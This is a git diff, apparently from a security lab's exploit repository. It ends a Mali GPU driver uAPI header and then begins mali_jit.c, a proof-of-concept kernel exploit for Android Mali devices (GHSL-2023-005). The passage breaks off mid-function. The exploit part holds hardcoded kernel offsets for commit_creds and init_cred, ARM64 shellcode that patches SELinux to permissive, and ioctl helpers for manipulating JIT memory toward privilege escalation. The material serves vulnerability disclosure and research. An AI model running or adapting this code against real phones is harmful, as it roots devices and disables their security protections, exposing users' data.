norm_read_norm_write; + __u64 norm_read_forced_write; + __u64 forced_read_forced_write; + __u64 forced_read_norm_write; +}; + +/** + * typedef base_jd_prio - Base Atom priority. + * + * Only certain priority levels are actually implemented, as specified by the + * BASE_JD_PRIO_<...> definitions below. It is undefined to use a priority + * level that is not one of those defined below. + * + * Priority levels only affect scheduling after the atoms have had dependencies + * resolved. For example, a low priority atom that has had its dependencies + * resolved might run before a higher priority atom that has not had its + * dependencies resolved. + * + * In general, fragment atoms do not affect non-fragment atoms with + * lower priorities, and vice versa. One exception is that there is only one + * priority value for each context. So a high-priority (e.g.) fragment atom + * could increase its context priority, causing its non-fragment atoms to also + * be scheduled sooner. + * + * The atoms are scheduled as follows with respect to their priorities: + * * Let atoms 'X' and 'Y' be for the same job slot who have dependencies + * resolved, and atom 'X' has a higher priority than atom 'Y' + * * If atom 'Y' is currently running on the HW, then it is interrupted to + * allow atom 'X' to run soon after + * * If instead neither atom 'Y' nor atom 'X' are running, then when choosing + * the next atom to run, atom 'X' will always be chosen instead of atom 'Y' + * * Any two atoms that have the same priority could run in any order with + * respect to each other. That is, there is no ordering constraint between + * atoms of the same priority. 
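+ *
+ * As an illustrative scenario (not from the driver sources): if atom 'X'
+ * has BASE_JD_PRIO_HIGH and atom 'Y' has BASE_JD_PRIO_MEDIUM on the same
+ * slot and 'Y' is already running, 'Y' is interrupted so that 'X' can run
+ * soon after; two atoms that are both BASE_JD_PRIO_MEDIUM may complete in
+ * either order.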
+ * + * The sysfs file 'js_ctx_scheduling_mode' is used to control how atoms are + * scheduled between contexts. The default value, 0, will cause higher-priority + * atoms to be scheduled first, regardless of their context. The value 1 will + * use a round-robin algorithm when deciding which context's atoms to schedule + * next, so higher-priority atoms can only preempt lower priority atoms within + * the same context. See KBASE_JS_SYSTEM_PRIORITY_MODE and + * KBASE_JS_PROCESS_LOCAL_PRIORITY_MODE for more details. + */ +typedef __u8 base_jd_prio; + +/* Medium atom priority. This is a priority higher than BASE_JD_PRIO_LOW */ +#define BASE_JD_PRIO_MEDIUM ((base_jd_prio)0) +/* High atom priority. This is a priority higher than BASE_JD_PRIO_MEDIUM and + * BASE_JD_PRIO_LOW + */ +#define BASE_JD_PRIO_HIGH ((base_jd_prio)1) +/* Low atom priority. */ +#define BASE_JD_PRIO_LOW ((base_jd_prio)2) +/* Real-Time atom priority. This is a priority higher than BASE_JD_PRIO_HIGH, + * BASE_JD_PRIO_MEDIUM, and BASE_JD_PRIO_LOW + */ +#define BASE_JD_PRIO_REALTIME ((base_jd_prio)3) + +/* Count of the number of priority levels. This itself is not a valid + * base_jd_prio setting + */ +#define BASE_JD_NR_PRIO_LEVELS 4 + +/** + * struct base_jd_atom_v2 - Node of a dependency graph used to submit a + * GPU job chain or soft-job to the kernel driver. + * + * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS + * is set in the base_jd_core_req) the CPU address of a + * base_jd_fragment object. + * @udata: User data. + * @extres_list: List of external resources. + * @nr_extres: Number of external resources or JIT allocations. + * @jit_id: Zero-terminated array of IDs of just-in-time memory + * allocations written to by the atom. When the atom + * completes, the value stored at the + * &struct_base_jit_alloc_info.heap_info_gpu_addr of + * each allocation is read in order to enforce an + * overall physical memory usage limit. + * @pre_dep: Pre-dependencies. One needs to use a SETTER function to assign + * this field; this is done in order to reduce the possibility of + * improper assignment of a dependency field. + * @atom_number: Unique number to identify the atom. + * @prio: Atom priority. Refer to base_jd_prio for more details. + * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP + * specified. + * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified. + * @core_req: Core requirements. + * @renderpass_id: Renderpass identifier used to associate an atom that has + * BASE_JD_REQ_START_RENDERPASS set in its core requirements + * with an atom that has BASE_JD_REQ_END_RENDERPASS set. + * @padding: Unused. Must be zero. + * + * This structure has changed since UK 10.2 for which base_jd_core_req was a + * __u16 value. + * + * In UK 10.3 a core_req field of a __u32 type was added to the end of the + * structure, and the place in the structure previously occupied by __u16 + * core_req was kept but renamed to compat_core_req. + * + * From UK 11.20 - compat_core_req is now occupied by __u8 jit_id[2]. + * Compatibility with UK 10.x from UK 11.y is not handled because + * the major version increase prevents this. + * + * For UK 11.20 jit_id[2] must be initialized to zero. 
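+ *
+ * A minimal submission sketch (hedged; it mirrors the jit_allocate() helper
+ * in the exploit code later in this patch, with error handling omitted, and
+ * info standing for e.g. a struct base_jit_alloc_info):
+ *
+ *   struct base_jd_atom_v2 atom = {0};
+ *   atom.jc = (__u64)&info;
+ *   atom.atom_number = 1;
+ *   atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC;
+ *   struct kbase_ioctl_job_submit submit = {0};
+ *   submit.addr = (__u64)&atom;
+ *   submit.nr_atoms = 1;
+ *   submit.stride = sizeof(struct base_jd_atom_v2);
+ *   ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit);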
+ */ +struct base_jd_atom_v2 { + __u64 jc; + struct base_jd_udata udata; + __u64 extres_list; + __u16 nr_extres; + __u8 jit_id[2]; + struct base_dependency pre_dep[2]; + base_atom_id atom_number; + base_jd_prio prio; + __u8 device_nr; + __u8 jobslot; + base_jd_core_req core_req; + __u8 renderpass_id; + __u8 padding[7]; +}; + +/** + * struct base_jd_atom - Same as base_jd_atom_v2, but has an extra seq_nr + * at the beginning. + * + * @seq_nr: Sequence number of logical grouping of atoms. + * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS + * is set in the base_jd_core_req) the CPU address of a + * base_jd_fragment object. + * @udata: User data. + * @extres_list: List of external resources. + * @nr_extres: Number of external resources or JIT allocations. + * @jit_id: Zero-terminated array of IDs of just-in-time memory + * allocations written to by the atom. When the atom + * completes, the value stored at the + * &struct_base_jit_alloc_info.heap_info_gpu_addr of + * each allocation is read in order to enforce an + * overall physical memory usage limit. + * @pre_dep: Pre-dependencies. One needs to use a SETTER function to assign + * this field; this is done in order to reduce the possibility of + * improper assignment of a dependency field. + * @atom_number: Unique number to identify the atom. + * @prio: Atom priority. Refer to base_jd_prio for more details. + * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP + * specified. + * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified. + * @core_req: Core requirements. + * @renderpass_id: Renderpass identifier used to associate an atom that has + * BASE_JD_REQ_START_RENDERPASS set in its core requirements + * with an atom that has BASE_JD_REQ_END_RENDERPASS set. + * @padding: Unused. Must be zero. + */ +typedef struct base_jd_atom { + __u64 seq_nr; + __u64 jc; + struct base_jd_udata udata; + __u64 extres_list; + __u16 nr_extres; + __u8 jit_id[2]; + struct base_dependency pre_dep[2]; + base_atom_id atom_number; + base_jd_prio prio; + __u8 device_nr; + __u8 jobslot; + base_jd_core_req core_req; + __u8 renderpass_id; + __u8 padding[7]; +} base_jd_atom; + +struct base_jit_alloc_info { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; + __u64 heap_info_gpu_addr; +}; + +/* Job chain event code bits + * Defines the bits used to create ::base_jd_event_code + */ +enum { + BASE_JD_SW_EVENT_KERNEL = (1u << 15), /* Kernel side event */ + BASE_JD_SW_EVENT = (1u << 14), /* SW defined event */ + /* Event indicates success (SW events only) */ + BASE_JD_SW_EVENT_SUCCESS = (1u << 13), + BASE_JD_SW_EVENT_JOB = (0u << 11), /* Job related event */ + BASE_JD_SW_EVENT_BAG = (1u << 11), /* Bag related event */ + BASE_JD_SW_EVENT_INFO = (2u << 11), /* Misc/info event */ + BASE_JD_SW_EVENT_RESERVED = (3u << 11), /* Reserved event type */ + /* Mask to extract the type from an event code */ + BASE_JD_SW_EVENT_TYPE_MASK = (3u << 11) +}; + +/** + * enum base_jd_event_code - Job chain event codes + * + * @BASE_JD_EVENT_RANGE_HW_NONFAULT_START: Start of hardware non-fault status + * codes. + * Obscurely, BASE_JD_EVENT_TERMINATED + * indicates a real fault, because the + * job was hard-stopped. + * @BASE_JD_EVENT_NOT_STARTED: Can't be seen by userspace, treated as + * 'previous job done'. + * @BASE_JD_EVENT_STOPPED: Can't be seen by userspace, becomes + * TERMINATED, DONE or JOB_CANCELLED. 
+ * @BASE_JD_EVENT_TERMINATED: This is actually a fault status code - the job + * was hard stopped. + * @BASE_JD_EVENT_ACTIVE: Can't be seen by userspace, jobs only returned on + * complete/fail/cancel. + * @BASE_JD_EVENT_RANGE_HW_NONFAULT_END: End of hardware non-fault status codes. + * Obscurely, BASE_JD_EVENT_TERMINATED + * indicates a real fault, + * because the job was hard-stopped. + * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START: Start of hardware fault and + * software error status codes. + * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END: End of hardware fault and + * software error status codes. + * @BASE_JD_EVENT_RANGE_SW_SUCCESS_START: Start of software success status + * codes. + * @BASE_JD_EVENT_RANGE_SW_SUCCESS_END: End of software success status codes. + * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_START: Start of kernel-only status codes. + * Such codes are never returned to + * user-space. + * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_END: End of kernel-only status codes. + * @BASE_JD_EVENT_DONE: atom has completed successfully + * @BASE_JD_EVENT_JOB_CONFIG_FAULT: Atom dependencies configuration error which + * shall result in a failed atom + * @BASE_JD_EVENT_JOB_POWER_FAULT: The job could not be executed because the + * part of the memory system required to access + * job descriptors was not powered on + * @BASE_JD_EVENT_JOB_READ_FAULT: Reading a job descriptor into the Job + * manager failed + * @BASE_JD_EVENT_JOB_WRITE_FAULT: Writing a job descriptor from the Job + * manager failed + * @BASE_JD_EVENT_JOB_AFFINITY_FAULT: The job could not be executed because the + * specified affinity mask does not intersect + * any available cores + * @BASE_JD_EVENT_JOB_BUS_FAULT: A bus access failed while executing a job + * @BASE_JD_EVENT_INSTR_INVALID_PC: A shader instruction with an illegal program + * counter was executed. + * @BASE_JD_EVENT_INSTR_INVALID_ENC: A shader instruction with an illegal + * encoding was executed. + * @BASE_JD_EVENT_INSTR_TYPE_MISMATCH: A shader instruction was executed where + * the instruction encoding did not match the + * instruction type encoded in the program + * counter. + * @BASE_JD_EVENT_INSTR_OPERAND_FAULT: A shader instruction was executed that + * contained invalid combinations of operands. + * @BASE_JD_EVENT_INSTR_TLS_FAULT: A shader instruction was executed that tried + * to access the thread local storage section + * of another thread. + * @BASE_JD_EVENT_INSTR_ALIGN_FAULT: A shader instruction was executed that + * tried to do an unsupported unaligned memory + * access. + * @BASE_JD_EVENT_INSTR_BARRIER_FAULT: A shader instruction was executed that + * failed to complete an instruction barrier. + * @BASE_JD_EVENT_DATA_INVALID_FAULT: Any data structure read as part of the job + * contains invalid combinations of data. + * @BASE_JD_EVENT_TILE_RANGE_FAULT: Tile or fragment shading was asked to + * process a tile that is entirely outside the + * bounding box of the frame. + * @BASE_JD_EVENT_STATE_FAULT: Matches ADDR_RANGE_FAULT. A virtual address + * has been found that exceeds the virtual + * address range. + * @BASE_JD_EVENT_OUT_OF_MEMORY: The tiler ran out of memory when executing a job. + * @BASE_JD_EVENT_UNKNOWN: If multiple jobs in a job chain fail, only + * the first one that reports an error will set + * and return full error information. + * Subsequent failing jobs will not update the + * error status registers, and may write an + * error status of UNKNOWN. 
+ * @BASE_JD_EVENT_DELAYED_BUS_FAULT: The GPU received a bus fault for access to + * physical memory where the original virtual + * address is no longer available. + * @BASE_JD_EVENT_SHAREABILITY_FAULT: Matches GPU_SHAREABILITY_FAULT. A cache + * has detected that the same line has been + * accessed as both shareable and non-shareable + * memory from inside the GPU. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1: A memory access hit an invalid table + * entry at level 1 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2: A memory access hit an invalid table + * entry at level 2 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3: A memory access hit an invalid table + * entry at level 3 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4: A memory access hit an invalid table + * entry at level 4 of the translation table. + * @BASE_JD_EVENT_PERMISSION_FAULT: A memory access could not be allowed due to + * the permission flags set in translation + * table + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1: A bus fault occurred while reading + * level 0 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2: A bus fault occurred while reading + * level 1 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3: A bus fault occurred while reading + * level 2 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4: A bus fault occurred while reading + * level 3 of the translation tables. + * @BASE_JD_EVENT_ACCESS_FLAG: Matches ACCESS_FLAG_0. A memory access hit a + * translation table entry with the ACCESS_FLAG + * bit set to zero in level 0 of the + * page table, and the DISABLE_AF_FAULT flag + * was not set. + * @BASE_JD_EVENT_MEM_GROWTH_FAILED: raised for JIT_ALLOC atoms that failed to + * grow memory on demand + * @BASE_JD_EVENT_JOB_CANCELLED: raised when this atom was hard-stopped or its + * dependencies failed + * @BASE_JD_EVENT_JOB_INVALID: raised for many reasons, including invalid data + * in the atom which overlaps with + * BASE_JD_EVENT_JOB_CONFIG_FAULT, or if the + * platform doesn't support the feature specified in + * the atom. + * @BASE_JD_EVENT_PM_EVENT: TODO: remove as it's not used + * @BASE_JD_EVENT_TIMED_OUT: TODO: remove as it's not used + * @BASE_JD_EVENT_BAG_INVALID: TODO: remove as it's not used + * @BASE_JD_EVENT_PROGRESS_REPORT: TODO: remove as it's not used + * @BASE_JD_EVENT_BAG_DONE: TODO: remove as it's not used + * @BASE_JD_EVENT_DRV_TERMINATED: this is a special event generated to indicate + * to userspace that the KBase context has been + * destroyed and Base should stop listening for + * further events + * @BASE_JD_EVENT_REMOVED_FROM_NEXT: raised when an atom that was configured in + * the GPU has to be retried (but it has not + * started) due to e.g., GPU reset + * @BASE_JD_EVENT_END_RP_DONE: this is used for incremental rendering to signal + * the completion of a renderpass. This value + * shouldn't be returned to userspace but I haven't + * seen where it is reset back to JD_EVENT_DONE. + * + * HW and low-level SW events are represented by event codes. + * The status of jobs which succeeded are also represented by + * an event code (see @BASE_JD_EVENT_DONE). + * Events are usually reported as part of a &struct base_jd_event. 
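+ *
+ * As a sketch of how user space might classify a returned code (ev is an
+ * assumed struct base_jd_event_v2, defined further below):
+ *
+ *   if (ev.event_code & BASE_JD_SW_EVENT)
+ *           type = ev.event_code & BASE_JD_SW_EVENT_TYPE_MASK;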
+ * + * The event codes are encoded in the following way: + * * 10:0 - subtype + * * 12:11 - type + * * 13 - SW success (only valid if the SW bit is set) + * * 14 - SW event (HW event if not set) + * * 15 - Kernel event (should never be seen in userspace) + * + * Events are split up into ranges as follows: + * * BASE_JD_EVENT_RANGE_<description>_START + * * BASE_JD_EVENT_RANGE_<description>_END + * + * code is in <description>'s range when: + * BASE_JD_EVENT_RANGE_<description>_START <= code < + * BASE_JD_EVENT_RANGE_<description>_END + * + * Ranges can be asserted for adjacency by testing that the END of the previous + * is equal to the START of the next. This is useful for optimizing some tests + * for range. + * + * A limitation is that the last member of this enum must explicitly be handled + * (with an assert-unreachable statement) in switch statements that use + * variables of this type. Otherwise, the compiler warns that we have not + * handled that enum value. + */ +enum base_jd_event_code { + /* HW defined exceptions */ + BASE_JD_EVENT_RANGE_HW_NONFAULT_START = 0, + + /* non-fatal exceptions */ + BASE_JD_EVENT_NOT_STARTED = 0x00, + BASE_JD_EVENT_DONE = 0x01, + BASE_JD_EVENT_STOPPED = 0x03, + BASE_JD_EVENT_TERMINATED = 0x04, + BASE_JD_EVENT_ACTIVE = 0x08, + + BASE_JD_EVENT_RANGE_HW_NONFAULT_END = 0x40, + BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START = 0x40, + + /* job exceptions */ + BASE_JD_EVENT_JOB_CONFIG_FAULT = 0x40, + BASE_JD_EVENT_JOB_POWER_FAULT = 0x41, + BASE_JD_EVENT_JOB_READ_FAULT = 0x42, + BASE_JD_EVENT_JOB_WRITE_FAULT = 0x43, + BASE_JD_EVENT_JOB_AFFINITY_FAULT = 0x44, + BASE_JD_EVENT_JOB_BUS_FAULT = 0x48, + BASE_JD_EVENT_INSTR_INVALID_PC = 0x50, + BASE_JD_EVENT_INSTR_INVALID_ENC = 0x51, + BASE_JD_EVENT_INSTR_TYPE_MISMATCH = 0x52, + BASE_JD_EVENT_INSTR_OPERAND_FAULT = 0x53, + BASE_JD_EVENT_INSTR_TLS_FAULT = 0x54, + BASE_JD_EVENT_INSTR_BARRIER_FAULT = 0x55, + BASE_JD_EVENT_INSTR_ALIGN_FAULT = 0x56, + BASE_JD_EVENT_DATA_INVALID_FAULT = 0x58, + BASE_JD_EVENT_TILE_RANGE_FAULT = 0x59, + BASE_JD_EVENT_STATE_FAULT = 0x5A, + BASE_JD_EVENT_OUT_OF_MEMORY = 0x60, + BASE_JD_EVENT_UNKNOWN = 0x7F, + + /* GPU exceptions */ + BASE_JD_EVENT_DELAYED_BUS_FAULT = 0x80, + BASE_JD_EVENT_SHAREABILITY_FAULT = 0x88, + + /* MMU exceptions */ + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1 = 0xC1, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2 = 0xC2, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3 = 0xC3, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4 = 0xC4, + BASE_JD_EVENT_PERMISSION_FAULT = 0xC8, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1 = 0xD1, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2 = 0xD2, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3 = 0xD3, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4 = 0xD4, + BASE_JD_EVENT_ACCESS_FLAG = 0xD8, + + /* SW defined exceptions */ + BASE_JD_EVENT_MEM_GROWTH_FAILED = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_TIMED_OUT = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x001, + BASE_JD_EVENT_JOB_CANCELLED = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x002, + BASE_JD_EVENT_JOB_INVALID = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x003, + BASE_JD_EVENT_PM_EVENT = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x004, + + BASE_JD_EVENT_BAG_INVALID = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_BAG | 0x003, + + BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_RESERVED | 0x3FF, + + BASE_JD_EVENT_RANGE_SW_SUCCESS_START = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | 0x000, + + BASE_JD_EVENT_PROGRESS_REPORT = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_BAG_DONE = 
BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_SUCCESS | + BASE_JD_SW_EVENT_BAG | 0x000, + BASE_JD_EVENT_DRV_TERMINATED = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_INFO | 0x000, + + BASE_JD_EVENT_RANGE_SW_SUCCESS_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_RESERVED | 0x3FF, + + BASE_JD_EVENT_RANGE_KERNEL_ONLY_START = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | 0x000, + BASE_JD_EVENT_REMOVED_FROM_NEXT = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_END_RP_DONE = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x001, + + BASE_JD_EVENT_RANGE_KERNEL_ONLY_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_RESERVED | 0x3FF +}; + +/** + * struct base_jd_event_v2 - Event reporting structure + * + * @event_code: event code. + * @atom_number: the atom number that has completed. + * @udata: user data. + * + * This structure is used by the kernel driver to report information + * about GPU events. They can either be HW-specific events or low-level + * SW events, such as job-chain completion. + * + * The event code contains an event type field which can be extracted + * by ANDing with BASE_JD_SW_EVENT_TYPE_MASK. + */ +struct base_jd_event_v2 { + enum base_jd_event_code event_code; + base_atom_id atom_number; + struct base_jd_udata udata; +}; + +/** + * struct base_dump_cpu_gpu_counters - Structure for + * BASE_JD_REQ_SOFT_DUMP_CPU_GPU_COUNTERS + * jobs. + * @system_time: gpu timestamp + * @cycle_counter: gpu cycle count + * @sec: cpu time(sec) + * @usec: cpu time(usec) + * @padding: padding + * + * This structure is stored into the memory pointed to by the @jc field + * of &struct base_jd_atom. + * + * It must not occupy the same CPU cache line(s) as any neighboring data. + * This is to avoid cases where access to pages containing the structure + * is shared between cached and un-cached memory regions, which would + * cause memory corruption. + */ + +struct base_dump_cpu_gpu_counters { + __u64 system_time; + __u64 cycle_counter; + __u64 sec; + __u32 usec; + __u8 padding[36]; +}; + +#endif /* _UAPI_BASE_JM_KERNEL_H_ */ + diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/mali_jit.c b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_jit.c new file mode 100644 index 0000000..ba87406 --- /dev/null +++ b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_jit.c @@ -0,0 +1,659 @@ +#include <err.h> +#include <errno.h> +#include <fcntl.h> +#include <stdint.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <unistd.h> +#include <sys/ioctl.h> +#include <sys/mman.h> +#include "stdbool.h" +#include <sys/types.h> +#include <sys/stat.h> +#include <sys/system_properties.h> + +#include "mali.h" +#include "mali_base_jm_kernel.h" +#include "midgard.h" + +#ifdef SHELL +#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__) +#else +#include <android/log.h> +#define LOG(fmt, ...) 
__android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__) + +#endif //SHELL + +#define MALI "/dev/mali0" + +#define PAGE_SHIFT 12 + +#define PFN_DOWN(x) ((x) >> PAGE_SHIFT) + +#define FREED_NUM 1 + +#define FLUSH_SIZE (0x1000 * 0x1000) + +#define POOL_SIZE 16384 + +#define RESERVED_SIZE 32 + +#define TOTAL_RESERVED_SIZE 1024 + +#define FLUSH_REGION_SIZE 500 + +#define GROW_SIZE 0x2000 + +#define RECLAIM_SIZE (3 * POOL_SIZE) + +#define JIT_PAGES 0x1000000 + +#define JIT_GROUP_ID 1 + +#define KERNEL_BASE 0x80000000 + +#define OVERWRITE_INDEX 256 + +#define ADRP_INIT_INDEX 0 + +#define ADD_INIT_INDEX 1 + +#define ADRP_COMMIT_INDEX 2 + +#define ADD_COMMIT_INDEX 3 + +#define AVC_DENY_2211 0x8d6810 + +#define SEL_READ_ENFORCE_2211 0x8ea124 + +#define INIT_CRED_2211 0x2fd1388 + +#define COMMIT_CREDS_2211 0x17ada4 + +#define ADD_INIT_2211 0x910e2000 //add x0, x0, #0x388 + +#define ADD_COMMIT_2211 0x91369108 //add x8, x8, #0xda4 + +#define AVC_DENY_2212 0x8ba710 + +#define SEL_READ_ENFORCE_2212 0x8cdfd4 + +#define INIT_CRED_2212 0x2fd1418 + +#define COMMIT_CREDS_2212 0x177ee4 + +#define ADD_INIT_2212 0x91106000 //add x0, x0, #0x418 + +#define ADD_COMMIT_2212 0x913b9108 //add x8, x8, #0xee4 + +#define AVC_DENY_2301 0x8ba710 + +#define SEL_READ_ENFORCE_2301 0x8cdfd4 + +#define INIT_CRED_2301 0x2fd1418 + +#define COMMIT_CREDS_2301 0x177ee4 + +#define ADD_INIT_2301 0x91106000 //add x0, x0, #0x418 + +#define ADD_COMMIT_2301 0x913b9108 //add x8, x8, #0xee4 + +static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2301; + +static uint64_t avc_deny = AVC_DENY_2301; + +/* +Overwriting SELinux to permissive + strb wzr, [x0] + mov x0, #0 + ret +*/ +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; + +static uint32_t root_code[8] = {0}; + +static uint8_t atom_number = 1; +static void* flush_regions[FLUSH_REGION_SIZE]; +static uint64_t reclaim_va[RECLAIM_SIZE]; +static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; +static bool commit_failed = false; +static bool g_ready_commit = false; + +struct base_mem_handle { + struct { + __u64 handle; + } basep; +}; + +struct base_mem_aliasing_info { + struct base_mem_handle handle; + __u64 offset; + __u64 length; +}; + +static int open_dev(char* name) { + int fd = open(name, O_RDWR); + if (fd == -1) { + err(1, "cannot open %s\n", name); + } + return fd; +} + +uint8_t increase_atom_number() { + uint8_t out = atom_number; + if (++atom_number == 0) { + atom_number++; + } + return out; +} + +void setup_mali(int fd, int group_id) { + struct kbase_ioctl_version_check param = {0}; + if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) { + err(1, "version check failed\n"); + } + struct kbase_ioctl_set_flags set_flags = {group_id << 3}; + if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { + err(1, "set flags failed\n"); + } +} + +void* setup_tracking_page(int fd) { + void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE); + if (region == MAP_FAILED) { + err(1, "setup tracking page failed"); + } + return region; +} + +void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) { + struct kbase_ioctl_mem_jit_init init = {0}; + init.va_pages = va_pages; + init.max_allocations = 255; + init.trim_level = trim_level; + init.group_id = group_id; + init.phys_pages = va_pages; + + if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) { + err(1, "jit init failed\n"); + } +} + +uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t commit_pages, uint8_t bin_id, uint16_t 
usage_id, uint64_t gpu_alloc_addr) { + struct base_jit_alloc_info info = {0}; + struct base_jd_atom_v2 atom = {0}; + + info.id = id; + info.gpu_alloc_addr = gpu_alloc_addr; + info.va_pages = va_pages; + info.commit_pages = commit_pages; + info.extension = 0x1000; + info.bin_id = bin_id; + info.usage_id = usage_id; + + atom.jc = (uint64_t)(&info); + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC; + atom.nr_extres = 1; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + return *((uint64_t*)gpu_alloc_addr); +} + +void jit_free(int fd, uint8_t atom_number, uint8_t id) { + uint8_t free_id = id; + + struct base_jd_atom_v2 atom = {0}; + + atom.jc = (uint64_t)(&free_id); + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_SOFT_JIT_FREE; + atom.nr_extres = 1; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + +} + +void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) { + struct kbase_ioctl_mem_flags_change change = {0}; + change.flags = flags; + change.gpu_va = gpu_addr; + change.mask = flags; + if (ignore_results) { + ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change); + return; + } + if (ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change) < 0) { + err(1, "flags_change failed\n"); + } +} + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) { + err(1, "mem_alloc failed\n"); + } +} + +void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) { + err(1, "mem_alias failed\n"); + } +} + +void mem_query(int fd, union kbase_ioctl_mem_query* query) { + if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) { + err(1, "mem_query failed\n"); + } +} + +void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) { + struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, .pages = pages}; + if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) { + LOG("commit failed\n"); + commit_failed = true; + } +} + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22); + int prot = PROT_READ; + if (!read_only) { + alloc.in.flags |= BASE_MEM_PROT_GPU_WR; + prot |= PROT_WRITE; + } + alloc.in.va_pages = va_pages; + alloc.in.commit_pages = commit_pages; + 